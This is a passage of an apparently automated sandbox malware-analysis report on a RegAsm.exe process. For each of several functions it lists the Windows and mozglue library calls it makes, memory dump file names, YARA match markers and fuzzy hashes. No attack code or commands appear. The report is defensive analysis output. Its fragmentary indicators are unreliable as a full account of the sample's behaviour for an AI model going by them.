Function 6C5627E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C56284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C56289A
free.MOZGLUE(?,?,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C5628F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C562910
free.MOZGLUE(00000001,?,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C56293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C562620,?,?,?,6C5560AA,6C555FCB,6C5579A3), ref: 6C56294E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 50251e92d101bdccdd4ebeb289c114cf5c398854d4aa0501591501622ea1fb85
Instruction ID: 7aee96355b4c5f6e4be74458559cc6608dd168bd23accff48844aac943606bf5
Opcode Fuzzy Hash: 50251e92d101bdccdd4ebeb289c114cf5c398854d4aa0501591501622ea1fb85
Instruction Fuzzy Hash: BA41B0B1A003068FEB14CF69DC8876A73F6AB85308F254939D557EBB50E731E984CB51

Function 6C51CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E784), ref: 6C51CFF6
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C51D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C51D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C51D139

Strings

MOZ_CRASH(), xrefs: 6C51D187

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: eea004811850cbb022fdde2fda2c5ada49ff118b4c2f23638959a5a1d7683187
Instruction ID: 63533a312953038cf0a64c92f5fe19ba1cdcda32a55546e8ee62d398491bce4c
Opcode Fuzzy Hash: eea004811850cbb022fdde2fda2c5ada49ff118b4c2f23638959a5a1d7683187
Instruction Fuzzy Hash: 5941D432B442568FEB15CF7D8C9536A36B4FB49710F160239E918E7B84E7B15C008BC9

Function 6C514DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C514E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C514E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C514EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C514F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C514F1E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 50666e6cc211560e56c1248c3c9526a812329b882bbd5b62bc350dc10eabcd9a
Instruction ID: bc797e36747bf7c10cef8346210a1a298716399795b1f91726ae7ab7615f7817
Opcode Fuzzy Hash: 50666e6cc211560e56c1248c3c9526a812329b882bbd5b62bc350dc10eabcd9a
Instruction Fuzzy Hash: 8D41CA716087029FD705CF29C88495BBBE4BF89348F109A2DF86697B41DB30E958CB92

Function 6C52C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C52C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C52C1DC

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 081e0a36faa96d513ff7a7be63010b4b6c9a3a9fcdab3c11b329c9cd10cf9b06
Instruction ID: be2de12315b15da3f850c70816bcbfcb9a2cefc88787f76999a1411534d50ace
Opcode Fuzzy Hash: 081e0a36faa96d513ff7a7be63010b4b6c9a3a9fcdab3c11b329c9cd10cf9b06
Instruction Fuzzy Hash: C841B4B1D08750CFE710DF28C98179AB7F4AF85304F518A5DE8889B752E734E948CB92

Function 6C57A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59F770), ref: 6C57A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C57A87B

Part of subcall function 6C57A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C57A88F,00000000), ref: 6C57A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C57A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C57A90C
LeaveCriticalSection.KERNEL32(6C59F770), ref: 6C57A97E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 06dedb939e97d9e3636190acb2186f5607bd97900dcef1edd4824546073551ba
Instruction ID: 6a7c72c4f781ff4143104d0b686bdb2ea71480a747a5dbaaf5e90c58408b3e1c
Opcode Fuzzy Hash: 06dedb939e97d9e3636190acb2186f5607bd97900dcef1edd4824546073551ba
Instruction Fuzzy Hash: AB4180B0E00248CBDB10DFA4DC45ADEB7B5FF44324F148669E816AB791D731E985CBA1

Function 6C521530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C52152B,?,?,?,?,6C521248,?), ref: 6C52159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C52152B,?,?,?,?,6C521248,?), ref: 6C5215BC
moz_xmalloc.MOZGLUE(-00000001,?,6C52152B,?,?,?,?,6C521248,?), ref: 6C5215E7
free.MOZGLUE(?,?,?,?,?,?,6C52152B,?,?,?,?,6C521248,?), ref: 6C521606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C52152B,?,?,?,?,6C521248,?), ref: 6C521637

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 42aeb39cfe3f3fad4739bea13f764ba5482a97e5766a940b619ad10dd64f0ed4
Instruction ID: 2d52e3c43653f9cc81ec213b405b4d2ae641c0abc7a2aa0421a747063506e0b3
Opcode Fuzzy Hash: 42aeb39cfe3f3fad4739bea13f764ba5482a97e5766a940b619ad10dd64f0ed4
Instruction Fuzzy Hash: 1E31C272A001148BCB18CE78DC5086F77E9EB813647290B6DE823DBBD5EB35ED158B91

Function 6C57AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C58E330,?,6C53C059), ref: 6C57AD9D

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C58E330,?,6C53C059), ref: 6C57ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C58E330,?,6C53C059), ref: 6C57AE01
GetLastError.KERNEL32(?,00000000,?,?,6C58E330,?,6C53C059), ref: 6C57AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C58E330,?,6C53C059), ref: 6C57AE3D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 933901c79ba6b272ac780863eed4b87a12ea542ff78b1162ec86fb57914953a3
Instruction ID: 7007b81d0e64a34e33b7f465254eca8af011b67a43ad2fa21802b99947249910
Opcode Fuzzy Hash: 933901c79ba6b272ac780863eed4b87a12ea542ff78b1162ec86fb57914953a3
Instruction Fuzzy Hash: 57315EB1A012159FDB14DF798C44AABBBF8EF88614F158829E84AD7740E734E844CBA0

Function 6C575EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C58DCA0,?,?,?,6C54E8B5,00000000), ref: 6C575F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C54E8B5,00000000), ref: 6C575F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C54E8B5,00000000), ref: 6C575F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C54E8B5,00000000), ref: 6C575F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C54E8B5,00000000), ref: 6C575FD6

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: be34e02d5a3b8cae21004c29350e8427f33dea56ae6f1546fefdc73b97d439cc
Instruction ID: 04f70db3c9cbcb04d6b813de11c5cdcedf89461f563bf434e6e8a3928c79828e
Opcode Fuzzy Hash: be34e02d5a3b8cae21004c29350e8427f33dea56ae6f1546fefdc73b97d439cc
Instruction Fuzzy Hash: 37312C743006408FD720DF29CC98E2AB7F5FF89319BA54558E5568BBA5D731EC81CB90

Function 6C51B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C51B532
moz_xmalloc.MOZGLUE(?), ref: 6C51B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C51B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C51B57E
free.MOZGLUE(00000000), ref: 6C51B58F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: a1727cd71a21ae8b6febb59fae5bc295510a67a37c8eda16c83e4dc84d65ec7e
Instruction ID: 4c1c961cd5ad321ea805bbfa785709aaaaaae687a5dba1206502b7f5fa8c6f8e
Opcode Fuzzy Hash: a1727cd71a21ae8b6febb59fae5bc295510a67a37c8eda16c83e4dc84d65ec7e
Instruction Fuzzy Hash: D521E6B1A042059BEB009F65CC44B6ABBB9FF81304F254169E918DB742F775DD11C7A1

Function 6C51B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C51B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C51B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C51B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C51B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C51B849

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 0ec2cd29330cb0157c60c5f1667eacb872b5442f4615699d760dbac69ad6eaf3
Instruction ID: ac777dafffa1cb4b89cc67a41dd7d22b09a1a994505ec934a3eb10fdc91f3eaf
Opcode Fuzzy Hash: 0ec2cd29330cb0157c60c5f1667eacb872b5442f4615699d760dbac69ad6eaf3
Instruction Fuzzy Hash: CC216BB0E002199FEF04DFA9C8895FEBBB4EF49714F158169EC06A7700E731A944CBA0

Function 6C576E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C576E78

Part of subcall function 6C576A10: InitializeCriticalSection.KERNEL32(6C59F618), ref: 6C576A68
Part of subcall function 6C576A10: GetCurrentProcess.KERNEL32 ref: 6C576A7D
Part of subcall function 6C576A10: GetCurrentProcess.KERNEL32 ref: 6C576AA1
Part of subcall function 6C576A10: EnterCriticalSection.KERNEL32(6C59F618), ref: 6C576AAE
Part of subcall function 6C576A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C576AE1
Part of subcall function 6C576A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C576B15
Part of subcall function 6C576A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C576B65
Part of subcall function 6C576A10: LeaveCriticalSection.KERNEL32(6C59F618,?,?), ref: 6C576B83

MozFormatCodeAddress.MOZGLUE ref: 6C576EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C576EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C576EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C576EFF

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 4b31940220bb07c4e9eac586ca1d2cde0712e945a150f1d87e1165db2a625e67
Instruction ID: 0e73851ceebcdfdf458c9c648c3ad66467ca5b2b7115ac508072606522ac73ac
Opcode Fuzzy Hash: 4b31940220bb07c4e9eac586ca1d2cde0712e945a150f1d87e1165db2a625e67
Instruction Fuzzy Hash: 0C21B271A0435A8FDF14DF29DC84A9E77F5EF84308F054079E80997240EB709A48CFA2

Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425721
_free.LIBCMT ref: 00425734

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C

Function 6C550D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C513DEF), ref: 6C550D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C513DEF), ref: 6C550D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C513DEF), ref: 6C550DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C550D97, 6C550DBE
<jemalloc>, xrefs: 6C550D92, 6C550DB9

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: d006b57cb918b51b25af8171cfdbb1c62669aa269dee0cf632f58bea53b942ea
Instruction ID: 5a8bd62ffdad4e56dc1aec5ae55adb4d55b98f3676876df6a243ca8f57117c30
Opcode Fuzzy Hash: d006b57cb918b51b25af8171cfdbb1c62669aa269dee0cf632f58bea53b942ea
Instruction Fuzzy Hash: 9BF0E9723802D423E63025660C0AB5B269DABC2B68F754077F615DADC0DB60E81086A8

Function 6C575850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C57586C
CloseHandle.KERNEL32 ref: 6C575878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C575898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5758C9
free.MOZGLUE(00000000), ref: 6C5758D3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 4071445757c0a6fecbd4baf514d8f63a637eb63edbedcf1af78bba4e16e58c8d
Instruction ID: 65fa3bd51fe743e09d140be8141d9acd6ec0333a7f7fc0dac6d39624a0a46d0e
Opcode Fuzzy Hash: 4071445757c0a6fecbd4baf514d8f63a637eb63edbedcf1af78bba4e16e58c8d
Instruction Fuzzy Hash: 12016271704281ABDF10DF16DC087067BB9EB8332977742F5F41AD2211D73198148F99

Function 6C567620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C5675C4,?), ref: 6C56762B

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C5674D7,6C5715FC,?,?,?), ref: 6C567644
GetCurrentThreadId.KERNEL32 ref: 6C56765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C5674D7,6C5715FC,?,?,?), ref: 6C567663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C5674D7,6C5715FC,?,?,?), ref: 6C567677

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: dbba8fcbc6342279fffeb9e5cacb8b42021013e155665f190f4015c615d6c1b7
Instruction ID: 095a46697e8b49bd53c6c748e60e56293bd0bad2c43b95f4d774625300c6bd85
Opcode Fuzzy Hash: dbba8fcbc6342279fffeb9e5cacb8b42021013e155665f190f4015c615d6c1b7
Instruction Fuzzy Hash: 92F0FF71E10385ABE3009F21CC88676B778FFEA258F134356F90442602E7B0A9D08BD0

Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426725

Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964

__getptd.LIBCMT ref: 0042673C
__amsg_exit.LIBCMT ref: 0042674A
__lock.LIBCMT ref: 0042675A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042676E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
